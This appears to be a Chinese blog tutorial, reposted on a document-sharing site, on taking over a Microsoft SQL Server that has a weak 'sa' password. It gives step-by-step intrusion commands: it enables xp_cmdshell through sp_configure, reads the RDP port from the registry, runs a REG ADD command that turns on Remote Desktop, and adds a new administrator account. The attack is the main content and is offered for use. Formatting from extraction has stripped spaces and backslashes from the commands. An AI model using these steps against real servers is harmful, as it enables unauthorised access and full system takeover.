使用sql弱口令入侵sql服务器的探讨

《使用sql弱口令入侵sql服务器的探讨》由会员上传分享，免费在线阅读，更多相关内容在行业资料-天天文库。

1、使用SQL弱口令入侵SQL服务器使用的工具：扫描工具X-scan                       SQL查询分析器                       SQLtools命令集成版环境：Windowsxp和WindowsServer2003企业版1、在网络内扫描到一台SQLServer服务器，且sa密码为弱口令1232、通过SQLtools命令集成版这个软件，我们可以连上这台SQLServer服务器，如下图所示3、虽然我们能succeed连接到SQLServer服务器，但是在我们执行dirc

2、:查看c盘文件时候，可能会报错，基于这种情况，我们可以使用SQL查询分析器，修正该错误信息4、打开SQLServer查询分析器，输入IP地址和sa帐号及密码5、在查询分析器里输入SQL语句，并执行SQL语句：;EXECsp_configure'showadvancedoptions',1--;RECONFIGUREWITHOVERRIDE--;EXECsp_configure'xp_cmdshell',1--;RECONFIGUREWITHOVERRIDE--;EXECsp_configure  'show

3、advancedoptions',0--6、这时，我们在执行dirc:命令查看c盘下的文件，查询成功7、在SQLtools工具的dos命令窗口，执行netstat-an查看3389端口是否打开8、同时使用SQL命令需要查询默认的3389端口是否已经被更改SQl命令查询3389端口是否被更改：execxp_regread'HKEY_LOCAL_MACHINE','SYSTEMCurrentControlSetControlTerminalServerWinStationsRDP-Tcp','Port

4、Number'9、很显然，默认3389端口没有被修改，那么我们就可以执行dos命令，开启SQLServer服务器的3389端口DOS命令：REGADDHKLMSYSTEMCurrentControlSetControlTerminal""Server/vfDenyTSConnections/tREG_DWORD/d0/f10、再次查询SQlServer的3389端口是否已经打开      （很明显我们已经成功开启对方的3389端口）11、这时我们可以使用我们熟悉的dos命令对该SQLServer服务器

5、新建用户，并加入到Administrators组12、现在，我们就可以是用远程桌面连接这台SQLServer服务器了 备注：一：现在的SQLServer服务器弱口令，个人感觉扫描到的几率微乎其微二：如果对方没开启远程桌面，那么即使建立了自己的帐号，岂不也只能望而兴叹三：如果对方开启了远程桌面，但是设置了IPsec策略，仅运行特定的IP段或IP地址访问，那么...... 本文出自“Darren-pan”博客，http://darren.blog.51cto.com/1081720/583431